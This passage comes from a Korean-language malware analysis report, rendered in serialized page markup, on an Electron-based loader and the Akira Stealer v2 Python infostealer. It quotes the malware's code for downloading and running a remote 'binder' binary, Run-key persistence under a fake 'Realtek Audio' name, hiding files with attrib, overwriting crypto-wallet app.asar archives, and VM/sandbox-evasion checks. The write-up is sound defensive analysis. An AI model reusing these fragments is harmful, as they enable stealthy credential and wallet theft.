\"Microsoft\"",[1706,4100,3064],{"class":3027},[1706,4102,4103,4106],{"class":1708,"line":2425},[1706,4104,4105],{"class":2795},"    \"Internet Explorer\"",[1706,4107,3064],{"class":3027},[1706,4109,4110,4113],{"class":1708,"line":3081},[1706,4111,4112],{"class":2795},"    \"UserData\"",[1706,4114,3064],{"class":3027},[1706,4116,4117,4120],{"class":1708,"line":3874},[1706,4118,4119],{"class":2795},"    \"Updater.exe\"",[1706,4121,3064],{"class":3027},[1706,4123,4124],{"class":1708,"line":3880},[1706,4125,4126],{"class":3027},"  ),\n",[1706,4128,4130],{"class":1708,"line":4129},10,[1706,4131,3084],{"class":3027},[630,4133,4134,4137],{},[633,4135,4136],{},"PORTABLE_EXECUTABLE_FILE은 많은 패커(예: Electron)가 실행 중인 바이너리의 경로를 참조하기 위해 자동으로 설정하는 환경 변수입니다.",[633,4138,4139],{},"path.join(...)은 서로 다른 운영 체제 전반에서 완전히 정규화된 대상 경로를 구성합니다.",[526,4141,4142],{},"이 로직은 파일이 아직 존재하지 않는 경우에만 실행되며, 따라서 드로퍼가 삭제되면 이를 복원하는 자가 복구 메커니즘 역할을 합니다.",[526,4144,4145,4148],{},[567,4146,4147],{},"멀웨어 체인에서의 역할","\n이 복사된 Updater.exe의 존재는 다음을 보장합니다:",[630,4150,4151,4154],{},[633,4152,4153],{},"로더가 시스템 재부팅 전반에 걸쳐 스스로를 재트리거할 수 있습니다.",[633,4155,4156],{},"전체 감염 체인(main.exe, node.exe, 궁극적으로 astor.py로 이어지는)이 더 모니터링되기 쉬운 전통적인 레지스트리 지속성 메커니즘에 의존하지 않고도 재개시될 수 있습니다.",[888,4158,4160],{"id":4159},"_626-선택적-바인더-실행","6.2.6 선택적 바인더 실행",[526,4162,894],{},[526,4164,4165,4166,4168],{},"주된 스틸러 페이로드(",[578,4167,612],{},")의 다운로드 및 실행 외에도, 복호화된 JavaScript에는 \"바인더\"라고 불리는 보조 실행 파일을 선택적으로 다운로드하고 실행하는 로직도 포함되어 있습니다. 이 구성 요소는 지속성, 시선 분산, 또는 추가 멀웨어 모듈의 배포에 사용될 수 있습니다.",[526,4170,4171],{},[567,4172,4173],{},"조건부 실행",[526,4175,4176],{},"바인더 로직은 특정 플래그가 설정된 경우에만 활성화됩니다:",[615,4178,4180],{"className":3008,"code":4179,"language":3010,"meta":530,"style":530},"enableBinder = true;\n",[578,4181,4182],{"__ignoreMap":530},[1706,4183,4184,4187,4189,4192],{"class":1708,"line":1709},[1706,4185,4186],{"class":3027},"enableBinder ",[1706,4188,3185],{"class":3017},[1706,4190,4191],{"class":2799}," true",[1706,4193,3467],{"class":3027},[526,4195,4196,4197,4200],{},"분석한 샘플에서 이 값은 기본적으로 ",[578,4198,4199],{},"false","로 설정되어 있었지만, 그 로직은 페이로드에 삽입된 채로 남아 있으며 다른 캠페인이나 변종에서 손쉽게 활성화될 수 있습니다.",[526,4202,4203],{},[567,4204,4205],{},"바인더 다운로드 로직",[526,4207,4208,4209,4212],{},"활성화되면, 스크립트는 ",[578,4210,4211],{},"%BINDERURL%"," 플레이스홀더로 정의된 URL에서 외부 바이너리를 가져오려고 시도합니다:",[615,4214,4216],{"className":3008,"code":4215,"language":3010,"meta":530,"style":530},"const fileUrl = \"%BINDERURL%\";\nconst fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\nconst writer = fs.createWriteStream(binderFile);\nfileResponse.data.pipe(writer);\n",[578,4217,4218,4232,4252,4267],{"__ignoreMap":530},[1706,4219,4220,4222,4225,4227,4230],{"class":1708,"line":1709},[1706,4221,3018],{"class":3017},[1706,4223,4224],{"class":2799}," fileUrl",[1706,4226,3024],{"class":3017},[1706,4228,4229],{"class":2795}," \"%BINDERURL%\"",[1706,4231,3467],{"class":3027},[1706,4233,4234,4236,4238,4240,4242,4244,4246,4248,4250],{"class":1708,"line":531},[1706,4235,3018],{"class":3017},[1706,4237,3490],{"class":2799},[1706,4239,3024],{"class":3017},[1706,4241,3495],{"class":3017},[1706,4243,3498],{"class":3027},[1706,4245,3501],{"class":2791},[1706,4247,3504],{"class":3027},[1706,4249,3507],{"class":2795},[1706,4251,3510],{"class":3027},[1706,4253,4254,4256,4258,4260,4262,4264],{"class":1708,"line":2091},[1706,4255,3018],{"class":3017},[1706,4257,3528],{"class":2799},[1706,4259,3024],{"class":3017},[1706,4261,3533],{"class":3027},[1706,4263,3536],{"class":2791},[1706,4265,4266],{"class":3027},"(binderFile);\n",[1706,4268,4269,4271,4273],{"class":1708,"line":2097},[1706,4270,3544],{"class":3027},[1706,4272,3547],{"class":2791},[1706,4274,3550],{"class":3027},[630,4276,4277,4282],{},[633,4278,4279,4281],{},[578,4280,3378],{}," 파일은 시스템의 임시 디렉터리에 저장됩니다.",[633,4283,4284,4286],{},[578,4285,2895],{},"과 마찬가지로, 바이너리는 전체를 메모리에 로드하지 않기 위해 Axios를 사용해 스트리밍 방식으로 다운로드됩니다.",[526,4288,4289],{},[567,4290,4291],{},"실행 전략",[526,4293,4294,4295,4297],{},"성공적으로 다운로드된 후, 스크립트는 ",[578,4296,1129],{},"를 사용해 다운로드된 바이너리를 호출하여 새 셸 컨텍스트에서 실행되도록 합니다:",[615,4299,4301],{"className":3008,"code":4300,"language":3010,"meta":530,"style":530},"exec(`start cmd /c start ${binderFile}`, ...);\n",[578,4302,4303],{"__ignoreMap":530},[1706,4304,4305,4307,4309,4312,4315,4318,4320,4323],{"class":1708,"line":1709},[1706,4306,3935],{"class":2791},[1706,4308,3219],{"class":3027},[1706,4310,4311],{"class":2795},"`start cmd /c start ${",[1706,4313,4314],{"class":3027},"binderFile",[1706,4316,4317],{"class":2795},"}`",[1706,4319,646],{"class":3027},[1706,4321,4322],{"class":3017},"...",[1706,4324,3084],{"class":3027},[526,4326,4327],{},"신뢰성을 높이기 위해, 스크립트에는 재시도 로직이 포함되어 있습니다:",[615,4329,4331],{"className":3008,"code":4330,"language":3010,"meta":530,"style":530},"setTimeout(() => {\n  exec(...);\n}, 5000);\n",[578,4332,4333,4345,4356],{"__ignoreMap":530},[1706,4334,4335,4338,4341,4343],{"class":1708,"line":1709},[1706,4336,4337],{"class":2791},"setTimeout",[1706,4339,4340],{"class":3027},"(() ",[1706,4342,3807],{"class":3017},[1706,4344,3810],{"class":3027},[1706,4346,4347,4350,4352,4354],{"class":1708,"line":531},[1706,4348,4349],{"class":2791},"  exec",[1706,4351,3219],{"class":3027},[1706,4353,4322],{"class":3017},[1706,4355,3084],{"class":3027},[1706,4357,4358,4361,4364],{"class":1708,"line":2091},[1706,4359,4360],{"class":3027},"}, ",[1706,4362,4363],{"class":2799},"5000",[1706,4365,3084],{"class":3027},[526,4367,4368],{},"이는 초기 실행이 실패하더라도(예: 시스템 부하나 경쟁 조건으로 인해) 멀웨어가 짧은 지연 후 바이너리 실행을 재시도하도록 보장합니다.",[526,4370,4371],{},[567,4372,4373],{},"바인더의 사용 사례",[526,4375,4376],{},"이 특정 샘플에서는 바인더 바이너리의 정확한 목적이 드러나지 않았지만(플레이스홀더 URL 때문에), 이러한 구성 요소는 일반적으로 다음에 사용됩니다:",[630,4378,4379,4382,4385,4388],{},[633,4380,4381],{},"주된 멀웨어 구성 요소의 재설치 또는 재실행",[633,4383,4384],{},"가짜 설치 프로그램이나 미끼 애플리케이션 표시",[633,4386,4387],{},"추가 스파이웨어, 백도어, 랜섬웨어 배포",[633,4389,4390],{},"시스템 설정 수정 또는 보안 기능 비활성화",[740,4392,4394],{"id":4393},"_63-요약","6.3 요약",[526,4396,746],{},[526,4398,4399,4401],{},[578,4400,2833],{},"는 산업 표준 암호화(PBKDF2 + AES-256-CBC)를 사용해 자신의 진정한 목적을 보호하는, 고도로 난독화되고 암호화된 JavaScript 로더입니다. 복호화되면, 다음을 수행하는 완전한 기능의 2단계 로더로 작동합니다:",[630,4403,4404,4410,4413,4419],{},[633,4405,4406,4407,4409],{},"추가 멀웨어(",[578,4408,2895],{},") 회수",[633,4411,4412],{},"페이로드 동작 동적 수정",[633,4414,4415,4416,4418],{},"실제 스틸러 스크립트(",[578,4417,612],{},") 실행",[633,4420,4421,4423],{},[578,4422,601],{},"를 복원하여 지속성 강화",[526,4425,4426,4427,4430],{},"암호화, 동적 실행, 모듈형 페이로드 회수, 파일리스 작동의 조합은 Electron 셸 안에서 Node.js 기능을 활용하는 ",[567,4428,4429],{},"고도로 발전된 JavaScript 기반 멀웨어 아키텍처","를 잘 보여 줍니다.",[557,4432,4434,4435,2040],{"id":4433},"_7-심층-분석-akira-stealer-v2-astorpy","7. 심층 분석: Akira Stealer v2 (",[578,4436,612],{},[526,4438,562],{},[740,4440,4442],{"id":4441},"_71-상위-수준-기능","7.1. 상위 수준 기능",[526,4444,746],{},[526,4446,4447,4448,4450],{},"Akira Stealer v2(",[578,4449,612],{},")는 Python으로 작성된 다기능 모듈형 인포스틸러 멀웨어입니다. Chromium 및 Firefox 기반 브라우저, 암호화폐 지갑, 통신 클라이언트(예: Discord, Telegram), 시스템 파일에서 광범위한 민감 사용자 데이터를 유출하도록 설계되었습니다. 정교한 분석 방해 메커니즘, 레지스트리 기반 지속성, 클립보드 하이재킹, 메모리 인젝션 기법을 통합합니다.",[740,4452,4454],{"id":4453},"_72-지속성-및-배포","7.2 지속성 및 배포",[526,4456,746],{},[888,4458,4460],{"id":4459},"_721-실행-체인-맥락","7.2.1 실행 체인 맥락",[526,4462,894],{},[526,4464,4465,4467],{},[578,4466,612],{},"는 독립적으로 실행되지 않고, 다단계 공격 체인의 최종 페이로드입니다:",[615,4469,4473],{"className":4470,"code":4471,"language":4472,"meta":530,"style":530},"language-plaintext shiki shiki-themes github-light github-dark","Updater.exe\n  └── main.exe (Electron app)\n        └── cmd.exe\n              └── python.exe astor.py\n","plaintext",[578,4474,4475,4480,4485,4490],{"__ignoreMap":530},[1706,4476,4477],{"class":1708,"line":1709},[1706,4478,4479],{},"Updater.exe\n",[1706,4481,4482],{"class":1708,"line":531},[1706,4483,4484],{},"  └── main.exe (Electron app)\n",[1706,4486,4487],{"class":1708,"line":2091},[1706,4488,4489],{},"        └── cmd.exe\n",[1706,4491,4492],{"class":1708,"line":2097},[1706,4493,4494],{},"              └── python.exe astor.py\n",[526,4496,4497,4498,4500],{},"이 구조화된 실행 체인은 각 단계가 악성 기능을 다음 단계에 위임함으로써 탐지를 회피하도록 합니다. ",[578,4499,601],{},"가 시퀀스를 개시하며 지속성 유지를 담당합니다.",[888,4502,4504],{"id":4503},"_722-레지스트리-기반-지속성","7.2.2 레지스트리 기반 지속성",[526,4506,894],{},[526,4508,4509,4510,4512],{},"Akira는 현재 사용자의 Run 경로 아래에 레지스트리 키를 작성하여 지속성을 확립합니다. 이는 시스템이 시작될 때마다 ",[578,4511,601],{},"가 실행되도록 보장합니다:",[615,4514,4518],{"className":4515,"code":4516,"language":4517,"meta":530,"style":530},"language-python shiki shiki-themes github-light github-dark","command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\nos.system(command)\n","python",[578,4519,4520,4525],{"__ignoreMap":530},[1706,4521,4522],{"class":1708,"line":1709},[1706,4523,4524],{},"command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\n",[1706,4526,4527],{"class":1708,"line":531},[1706,4528,4529],{},"os.system(command)\n",[630,4531,4532,4539,4546],{},[633,4533,4534,1001,4537],{},[567,4535,4536],{},"경로",[578,4538,1678],{},[633,4540,4541,1001,4543,4545],{},[567,4542,1683],{},[578,4544,1686],{},"(무해해 보이도록 선택됨)",[633,4547,4548,4550,4551],{},[567,4549,1691],{},": 일반적으로 ",[578,4552,4553],{},"AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\Updater.exe",[526,4555,4556,4557,4560],{},"이 명령은 PowerShell 또는 네이티브 ",[578,4558,4559],{},"os.system()"," 실행을 통해 자동 실행 항목을 조용히 작성합니다.",[888,4562,4564],{"id":4563},"_723-파일-은닉","7.2.3 파일 은닉",[526,4566,894],{},[526,4568,4569],{},"사용자와 단순한 AV 스캔으로부터 바이너리를 더욱 가리기 위해, 파일은 숨김 및 시스템 속성으로 표시됩니다:",[615,4571,4573],{"className":4515,"code":4572,"language":4517,"meta":530,"style":530},"subprocess.run([\"attrib\", \"+h\", \"+s\", destination_path])\n",[578,4574,4575],{"__ignoreMap":530},[1706,4576,4577],{"class":1708,"line":1709},[1706,4578,4572],{},[630,4580,4581,4587],{},[633,4582,4583,4586],{},[578,4584,4585],{},"+h",": 파일을 숨김으로 표시",[633,4588,4589,4592],{},[578,4590,4591],{},"+s",": 파일을 보호된 시스템 파일로 표시",[526,4594,4595],{},"이는 표준 Windows 탐색기 보기에서 파일을 효과적으로 제거하고 은닉성을 높입니다.",[888,4597,4599],{"id":4598},"_724-재감염-기법","7.2.4 재감염 기법",[526,4601,894],{},[526,4603,4604,4605,646,4608,4611,4612,4614],{},"멀웨어는 Electron 애플리케이션 하이재킹을 통한 자기 복제 및 재감염을 지원합니다. 구체적으로, Electron 기반 데스크톱 지갑(예: ",[567,4606,4607],{},"Exodus",[567,4609,4610],{},"Atomic Wallet",")의 ",[578,4613,1075],{}," 아카이브를 교체하여 정상 앱 시작 중에 악성 JavaScript를 실행합니다.",[526,4616,4617],{},"이 로직은 알려진 지갑 앱 경로를 찾습니다:",[615,4619,4621],{"className":4515,"code":4620,"language":4517,"meta":530,"style":530},"path = os.getenv(\"APPDATA\") + \"\\\\Exodus\\\\resources\\\\app.asar\"\n",[578,4622,4623],{"__ignoreMap":530},[1706,4624,4625],{"class":1708,"line":1709},[1706,4626,4620],{},[526,4628,4629,4630,4632],{},"대상 파일이 존재하면, 무기화된 아카이브로 덮어써집니다. 이는 ",[578,4631,601],{},"를 수동으로 정리한 후에도 지속성을 보장합니다.",[740,4634,4636,4637,2040],{"id":4635},"_73-분석-방해-회피클래스-vmprotect","7.3 분석 방해 / 회피(클래스: ",[578,4638,4639],{},"VmProtect",[526,4641,746],{},[888,4643,4645],{"id":4644},"_731-서론","7.3.1 서론",[526,4647,894],{},[526,4649,4650,4651,4654,4655,4657],{},"현대 멀웨어 캠페인에서, 가상화 및 샌드박스 환경에서의 분석을 회피하는 것은 은닉성을 유지하는 데 필수적입니다. ",[4652,4653,676],"em",{}," 는 분석가가 통제하는 환경에서 공격적으로 식별하고 실행을 중단하는 포괄적인 VM/샌드박스 탐지 모듈(",[578,4656,4639],{},")을 구현합니다. 이 보고서는 각 탐지 기법을 해부하고, 전체 블랙리스트 정의를 포함한 정확한 코드 스니펫을 제공하며, 사용된 분석 방법론을 개괄합니다.",[888,4659,4661],{"id":4660},"_732-개요","7.3.2 개요",[526,4663,894],{},[526,4665,4666,4668],{},[578,4667,4639],{}," 클래스는 분석 환경에서 실행을 조기에 중단하기 위해 견고한 VM 및 샌드박스 탐지를 구현합니다. 두 가지 탐지 수준을 지원합니다:",[630,4670,4671,4677],{},[633,4672,4673,4676],{},[567,4674,4675],{},"레벨 1",": 경량의 빠른 검사",[633,4678,4679,4682],{},[567,4680,4681],{},"레벨 2",": 심층적이고 포괄적인 탐침",[526,4684,4685,4688,4689,4692,4693,4696],{},[578,4686,4687],{},"VmProtect.isVM(level)","이 ",[578,4690,4691],{},"True","를 반환하면, 멀웨어는 ",[578,4694,4695],{},"sys.exit()","를 호출하여 추가 분석을 방지합니다.",[888,4698,4700],{"id":4699},"_733-탐지-수준","7.3.3 탐지 수준",[526,4702,894],{},[1418,4704,4706,4707],{"style":4705},"width:100%; border-collapse: collapse;","\n  ",[1434,4708,4709,4706,4720,4706,4730,4706,4740,4706,4749,4706,4759,4706,4768,4706,4777],{},[1424,4710,4711,4712,4711,4715,4711,4718,4706],{},"\n    ",[1427,4713,4714],{},"기능",[1427,4716,4675],{"style":4717},"text-align: center;",[1427,4719,4681],{"style":4717},[1424,4721,4711,4722,4711,4725,4711,4728,4706],{},[1439,4723,4724],{},"HTTPSimulation",[1439,4726,4727],{"style":4717},"✔️",[1439,4729,4727],{"style":4717},[1424,4731,4711,4733,4711,4736,4711,4738,4706],{"style":4732},"background-color: #f5f5f5;",[1439,4734,4735],{},"컴퓨터 이름 블랙리스트",[1439,4737,4727],{"style":4717},[1439,4739,4727],{"style":4717},[1424,4741,4711,4742,4711,4745,4711,4747,4706],{},[1439,4743,4744],{},"사용자 계정 블랙리스트",[1439,4746,4727],{"style":4717},[1439,4748,4727],{"style":4717},[1424,4750,4711,4751,4711,4754,4711,4757,4706],{"style":4732},[1439,4752,4753],{},"하드웨어 UUID 블랙리스트",[1439,4755,4756],{"style":4717},"❌",[1439,4758,4727],{"style":4717},[1424,4760,4711,4761,4711,4764,4711,4766,4706],{},[1439,4762,4763],{},"퍼블릭 호스팅 API 검사",[1439,4765,4756],{"style":4717},[1439,4767,4727],{"style":4717},[1424,4769,4711,4770,4711,4773,4711,4775,4706],{"style":4732},[1439,4771,4772],{},"레지스트리 및 GPU 힌트",[1439,4774,4756],{"style":4717},[1439,4776,4727],{"style":4717},[1424,4778,4711,4779,4711,4782,4711,4784,4706],{},[1439,4780,4781],{},"백그라운드 작업 종료",[1439,4783,4727],{"style":4717},[1439,4785,4727],{"style":4717},[853,4787],{"className":4788},[856,857],[888,4790,4792,4793,4795],{"id":4791},"_734-vmprotect-아키텍처","7.3.4 ",[578,4794,4639],{}," 아키텍처",[526,4797,894],{},[526,4799,4800,4802],{},[578,4801,4639],{}," 클래스는 다음과 같은 주요 메서드를 노출합니다:",[630,4804,4805,4812,4819,4826,4833,4840,4847,4854],{},[633,4806,4807],{},[567,4808,4809],{},[578,4810,4811],{},"checkUUID()",[633,4813,4814],{},[567,4815,4816],{},[578,4817,4818],{},"checkComputerName()",[633,4820,4821],{},[567,4822,4823],{},[578,4824,4825],{},"checkUsers()",[633,4827,4828],{},[567,4829,4830],{},[578,4831,4832],{},"checkHosting()",[633,4834,4835],{},[567,4836,4837],{},[578,4838,4839],{},"checkHTTPSimulation()",[633,4841,4842],{},[567,4843,4844],{},[578,4845,4846],{},"checkRegistry()",[633,4848,4849],{},[567,4850,4851],{},[578,4852,4853],{},"killTasks()",[633,4855,4856],{},[567,4857,4858],{},[578,4859,4860],{},"isVM(level)",[526,4862,4863,4864,4867],{},"각 메서드는 불리언을 반환하거나 회피 단계를 실행합니다. ",[578,4865,4866],{},"isVM"," 래퍼는 지정된 수준에 따라 이 검사들을 집계합니다.",[1418,4869,4706,4870],{"style":4705},[1434,4871,4872,4706,4884,4706,4898,4706,4912,4706,4925,4706,4938,4706,4951,4706,4964,4706,4979],{},[1424,4873,4711,4874,4711,4878,4711,4881,4706],{},[1427,4875,4877],{"style":4876},"text-align: left;","메서드",[1427,4879,4880],{"style":4876},"트리거 조건",[1427,4882,4883],{"style":4876},"설명",[1424,4885,4711,4886,4711,4890,4711,4895,4706],{},[1439,4887,4888],{},[578,4889,4811],{},[1439,4891,4892],{},[578,4893,4894],{},"isVM(2)",[1439,4896,4897],{},"WMI UUID 블랙리스트",[1424,4899,4711,4900,4711,4904,4711,4909,4706],{"style":4732},[1439,4901,4902],{},[578,4903,4818],{},[1439,4905,4906],{},[578,4907,4908],{},"isVM(1,2)",[1439,4910,4911],{},"환경 호스트명 일치",[1424,4913,4711,4914,4711,4918,4711,4922,4706],{},[1439,4915,4916],{},[578,4917,4825],{},[1439,4919,4920],{},[578,4921,4908],{},[1439,4923,4924],{},"사용자명 블랙리스트",[1424,4926,4711,4927,4711,4931,4711,4935,4706],{"style":4732},[1439,4928,4929],{},[578,4930,4832],{},[1439,4932,4933],{},[578,4934,4894],{},[1439,4936,4937],{},"ip-api.com을 통한 IP 호스팅 제공자 검사",[1424,4939,4711,4940,4711,4944,4711,4948,4706],{},[1439,4941,4942],{},[578,4943,4839],{},[1439,4945,4946],{},[578,4947,4908],{},[1439,4949,4950],{},"HTTPS 인터셉션 탐지",[1424,4952,4711,4953,4711,4957,4711,4961,4706],{"style":4732},[1439,4954,4955],{},[578,4956,4846],{},[1439,4958,4959],{},[578,4960,4894],{},[1439,4962,4963],{},"레지스트리 및 GPU 드라이버 아티팩트",[1424,4965,4711,4966,4711,4970,4711,4976,4706],{},[1439,4967,4968],{},[578,4969,4853],{},[1439,4971,4972,4975],{},[578,4973,4974],{},"isVM(...)"," 생성 시",[1439,4977,4978],{},"알려진 분석 프로세스를 종료",[1424,4980,4711,4981,4711,4985,4711,4988,4706],{"style":4732},[1439,4982,4983],{},[578,4984,4860],{},[1439,4986,4987],{},"init",[1439,4989,4990,4991,4993],{},"검사를 집계하고 ",[578,4992,4853],{}," 스레드를 호출",[853,4995],{"className":4996},[856,857],[615,4998,5000],{"className":4515,"code":4999,"language":4517,"meta":530,"style":530},"@staticmethod\ndef isVM(level: int) -> bool:\n    # Always start background task-killer\n    Thread(target=VmProtect.killTasks, daemon=True).start()\n    if level == 1:\n        # Fast path: HTTPS, hostname & user\n        return (\n            VmProtect.checkHTTPSimulation()\n            or VmProtect.checkComputerName()\n            or VmProtect.checkUsers()\n        )\n    if level == 2:\n        # Deep scan: includes UUID, hosting, registry & GPU\n        try:\n            return (\n                VmProtect.checkHTTPSimulation()\n                or VmProtect.checkUUID()\n                or VmProtect.checkComputerName()\n                or VmProtect.checkUsers()\n                or VmProtect.checkHosting()\n                or VmProtect.checkRegistry()\n            )\n        except:\n            return False\n    return False\n",[578,5001,5002,5007,5012,5017,5022,5027,5032,5037,5042,5047,5052,5058,5064,5070,5076,5082,5088,5094,5100,5106,5112,5118,5124,5130,5136],{"__ignoreMap":530},[1706,5003,5004],{"class":1708,"line":1709},[1706,5005,5006],{},"@staticmethod\n",[1706,5008,5009],{"class":1708,"line":531},[1706,5010,5011],{},"def isVM(level: int) -> bool:\n",[1706,5013,5014],{"class":1708,"line":2091},[1706,5015,5016],{},"    # Always start background task-killer\n",[1706,5018,5019],{"class":1708,"line":2097},[1706,5020,5021],{},"    Thread(target=VmProtect.killTasks, daemon=True).start()\n",[1706,5023,5024],{"class":1708,"line":2419},[1706,5025,5026],{},"    if level == 1:\n",[1706,5028,5029],{"class":1708,"line":2425},[1706,5030,5031],{},"        # Fast path: HTTPS, hostname & user\n",[1706,5033,5034],{"class":1708,"line":3081},[1706,5035,5036],{},"        return (\n",[1706,5038,5039],{"class":1708,"line":3874},[1706,5040,5041],{},"            VmProtect.checkHTTPSimulation()\n",[1706,5043,5044],{"class":1708,"line":3880},[1706,5045,5046],{},"            or VmProtect.checkComputerName()\n",[1706,5048,5049],{"class":1708,"line":4129},[1706,5050,5051],{},"            or VmProtect.checkUsers()\n",[1706,5053,5055],{"class":1708,"line":5054},11,[1706,5056,5057],{},"        )\n",[1706,5059,5061],{"class":1708,"line":5060},12,[1706,5062,5063],{},"    if level == 2:\n",[1706,5065,5067],{"class":1708,"line":5066},13,[1706,5068,5069],{},"        # Deep scan: includes UUID, hosting, registry & GPU\n",[1706,5071,5073],{"class":1708,"line":5072},14,[1706,5074,5075],{},"        try:\n",[1706,5077,5079],{"class":1708,"line":5078},15,[1706,5080,5081],{},"            return (\n",[1706,5083,5085],{"class":1708,"line":5084},16,[1706,5086,5087],{},"                VmProtect.checkHTTPSimulation()\n",[1706,5089,5091],{"class":1708,"line":5090},17,[1706,5092,5093],{},"                or VmProtect.checkUUID()\n",[1706,5095,5097],{"class":1708,"line":5096},18,[1706,5098,5099],{},"                or VmProtect.checkComputerName()\n",[1706,5101,5103],{"class":1708,"line":5102},19,[1706,5104,5105],{},"                or VmProtect.checkUsers()\n",[1706,5107,5109],{"class":1708,"line":5108},20,[1706,5110,5111],{},"                or VmProtect.checkHosting()\n",[1706,5113,5115],{"class":1708,"line":5114},21,[1706,5116,5117],{},"                or VmProtect.checkRegistry()\n",[1706,5119,5121],{"class":1708,"line":5120},22,[1706,5122,5123],{},"            )\n",[1706,5125,5127],{"class":1708,"line":5126},23,[1706,5128,5129],{},"        except:\n",[1706,5131,5133],{"class":1708,"line":5132},24,[1706,5134,5135],{},"            return False\n",[1706,5137,5139],{"class":1708,"line":5138},25,[1706,5140,5141],{},"    return False\n",[888,5143,5145],{"id":5144},"_735-uuid-검사-하드웨어-uuid로-가상-머신-식별","7.3.5 UUID 검사 – 하드웨어 UUID로 가상 머신 식별",[526,5147,894],{},[526,5149,5150],{},"멀웨어 회피의 흔한 전술은 기저 하드웨어 환경의 지문을 채취하는 것입니다. 가상 머신을 알리는 가장 초기의 식별자 중 하나는 시스템 UUID(Universally Unique Identifier)입니다. VMware나 VirtualBox 같은 가상화 플랫폼은 종종 예측 가능하거나 재사용된 UUID를 생성하며, 멀웨어는 이를 사용해 가상화되거나 샌드박스화된 환경에서 실행 중인지 추론할 수 있습니다.",[615,5152,5154],{"className":4515,"code":5153,"language":4517,"meta":530,"style":530},"@staticmethod\ndef checkUUID() -> bool:\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\", shell=True,\n            capture_output=True\n        ).stdout.splitlines()[2].decode().strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n",[578,5155,5156,5160,5165,5170,5175,5180,5185,5190,5195,5200],{"__ignoreMap":530},[1706,5157,5158],{"class":1708,"line":1709},[1706,5159,5006],{},[1706,5161,5162],{"class":1708,"line":531},[1706,5163,5164],{},"def checkUUID() -> bool:\n",[1706,5166,5167],{"class":1708,"line":2091},[1706,5168,5169],{},"    try:\n",[1706,5171,5172],{"class":1708,"line":2097},[1706,5173,5174],{},"        raw = subprocess.run(\n",[1706,5176,5177],{"class":1708,"line":2419},[1706,5178,5179],{},"            \"wmic csproduct get uuid\", shell=True,\n",[1706,5181,5182],{"class":1708,"line":2425},[1706,5183,5184],{},"            capture_output=True\n",[1706,5186,5187],{"class":1708,"line":3081},[1706,5188,5189],{},"        ).stdout.splitlines()[2].decode().strip()\n",[1706,5191,5192],{"class":1708,"line":3874},[1706,5193,5194],{},"    except:\n",[1706,5196,5197],{"class":1708,"line":3880},[1706,5198,5199],{},"        raw = \"\"\n",[1706,5201,5202],{"class":1708,"line":4129},[1706,5203,5204],{},"    return raw in VmProtect.BLACKLISTED_UUIDS\n",[526,5206,5207],{},"이 검사는 WMIC(Windows Management Instrumentation Command-line) 도구를 활용해 호스트 머신의 UUID를 추출합니다. 반환된 값은 가상 머신 템플릿이나 알려진 분석 환경과 흔히 연관되는 UUID 목록과 대조됩니다.",[888,5209,5211],{"id":5210},"_736-컴퓨터-이름-검사-호스트명으로-샌드박스-및-분석-환경-탐지","7.3.6 컴퓨터 이름 검사 – 호스트명으로 샌드박스 및 분석 환경 탐지",[526,5213,894],{},[526,5215,5216,5219],{},[578,5217,5218],{},"%COMPUTERNAME%"," 환경 변수를 통해 접근하는 시스템 호스트명은 종종 그 환경에 대한 단서를 드러냅니다. 분석가들은 \"DESKTOP-XXXXXXX\", \"WIN10ANALYSIS\" 같은 기본 또는 빠르게 생성된 호스트명이나 내부 환경과 연결된 이름을 자주 사용합니다. 멀웨어는 시스템의 호스트명을 블랙리스트와 비교하여 이를 악용합니다.",[615,5221,5223],{"className":4515,"code":5222,"language":4517,"meta":530,"style":530},"@staticmethod\ndef checkComputerName() -> bool:\n    name = os.getenv(\"computername\", \"\").lower()\n    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n\nBLACKLISTED_COMPUTERNAMES = (\n    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n    'desktop-vkeons4','ntt-eff-2w11wss',\n    # ... dozens more entries ...\n)\n",[578,5224,5225,5229,5234,5239,5244,5248,5253,5258,5263,5268],{"__ignoreMap":530},[1706,5226,5227],{"class":1708,"line":1709},[1706,5228,5006],{},[1706,5230,5231],{"class":1708,"line":531},[1706,5232,5233],{},"def checkComputerName() -> bool:\n",[1706,5235,5236],{"class":1708,"line":2091},[1706,5237,5238],{},"    name = os.getenv(\"computername\", \"\").lower()\n",[1706,5240,5241],{"class":1708,"line":2097},[1706,5242,5243],{},"    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[1706,5245,5246],{"class":1708,"line":2419},[1706,5247,3871],{"emptyLinePlaceholder":325},[1706,5249,5250],{"class":1708,"line":2425},[1706,5251,5252],{},"BLACKLISTED_COMPUTERNAMES = (\n",[1706,5254,5255],{"class":1708,"line":3081},[1706,5256,5257],{},"    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n",[1706,5259,5260],{"class":1708,"line":3874},[1706,5261,5262],{},"    'desktop-vkeons4','ntt-eff-2w11wss',\n",[1706,5264,5265],{"class":1708,"line":3880},[1706,5266,5267],{},"    # ... dozens more entries ...\n",[1706,5269,5270],{"class":1708,"line":4129},[1706,5271,5272],{},")\n",[526,5274,5275],{},"일치가 발견되면, 멀웨어는 실행을 중단하거나 가짜 페이로드를 배포하여 전체 행위 분석을 회피할 수 있습니다.",[888,5277,5279],{"id":5278},"_737-사용자-계정-검사-분석가-또는-기본-계정-프로파일링","7.3.7 사용자 계정 검사 – 분석가 또는 기본 계정 프로파일링",[526,5281,894],{},[526,5283,5284],{},"또 다른 휴리스틱은 멀웨어가 실행되는 사용자명을 평가하는 것입니다. 많은 가상 머신 템플릿과 샌드박스는 \"Abby\", \"Test\", \"wdagutilityaccount\" 같은 흔한 사용자명을 재사용합니다. 이런 이름들은 엔트로피가 낮고 오픈 소스 샌드박스 환경에 하드코딩되어 있는 경우가 많습니다.",[615,5286,5288],{"className":4515,"code":5287,"language":4517,"meta":530,"style":530},"@staticmethod\ndef checkUsers() -> bool:\n    user = os.getlogin().lower()\n    return user in 